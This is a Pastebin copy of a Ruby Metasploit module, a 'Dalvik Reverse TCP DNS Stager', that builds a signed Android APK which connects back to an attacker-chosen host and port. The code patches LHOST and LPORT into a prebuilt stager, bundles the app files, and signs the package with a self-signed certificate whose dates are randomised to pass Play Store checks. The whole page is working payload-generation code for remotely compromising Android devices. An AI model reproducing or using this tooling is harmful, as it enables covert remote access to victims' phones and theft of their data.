SHARE
TWEET

reverse_tcp_dns

Edszx May 20th, 2014 1,271 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##
  2. # This module requires Metasploit: http//metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. require 'msf/core'
  7. require 'msf/core/handler/reverse_tcp'
  8. require 'msf/base/sessions/command_shell'
  9. require 'msf/base/sessions/command_shell_options'
  10.  
  11. module Metasploit3
  12.  
  13.   include Msf::Payload::Stager
  14.   include Msf::Payload::Dalvik
  15.  
  16.   def initialize(info = {})
  17.     super(merge_info(info,
  18.       'Name'                    => 'Dalvik Reverse TCP DNS Stager',
  19.       'Description'     => 'Connect back stager',
  20.       'Author'          => 'timwr (DNS port by Edszx)',
  21.       'License'         => MSF_LICENSE,
  22.       'Platform'                => 'android',
  23.       'Arch'                    => ARCH_DALVIK,
  24.       'Handler'         => Msf::Handler::ReverseTcp,
  25.       'Stager'          => {'Payload' => ""}
  26.     ))
  27.   end
  28.  
  29.   def string_sub(data, placeholder, input)
  30.     data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
  31.   end
  32.  
  33.   def generate_jar(opts={})
  34.     jar = Rex::Zip::Jar.new
  35.  
  36.     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
  37.  
  38.     string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_str) if datastore['LHOST']
  39.     string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
  40.     jar.add_file("classes.dex", fix_dex_header(classes))
  41.  
  42.     files = [
  43.       [ "AndroidManifest.xml" ],
  44.       [ "res", "drawable-mdpi", "icon.png" ],
  45.       [ "res", "layout", "main.xml" ],
  46.       [ "resources.arsc" ]
  47.     ]
  48.  
  49.     jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
  50.     jar.build_manifest
  51.  
  52.     x509_name = OpenSSL::X509::Name.parse(
  53.       "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
  54.       )
  55.     key  = OpenSSL::PKey::RSA.new(1024)
  56.     cert = OpenSSL::X509::Certificate.new
  57.     cert.version = 2
  58.     cert.serial = 1
  59.     cert.subject = x509_name
  60.     cert.issuer = x509_name
  61.     cert.public_key = key.public_key
  62.  
  63.     # Some time within the last 3 years
  64.     cert.not_before = Time.now - rand(3600*24*365*3)
  65.  
  66.     # From http://developer.android.com/tools/publishing/app-signing.html
  67.     # """
  68.     # A validity period of more than 25 years is recommended.
  69.     #
  70.     # If you plan to publish your application(s) on Google Play, note
  71.     # that a validity period ending after 22 October 2033 is a
  72.     # requirement. You can not upload an application if it is signed
  73.     # with a key whose validity expires before that date.
  74.     # """
  75.     # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
  76.     cert.not_after = Time.at( 0x78045d81  + rand( 0x7fffffff - 0x78045d81 ))
  77.  
  78.     jar.sign(key, cert, [cert])
  79.  
  80.     jar
  81.   end
  82.  
  83. end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top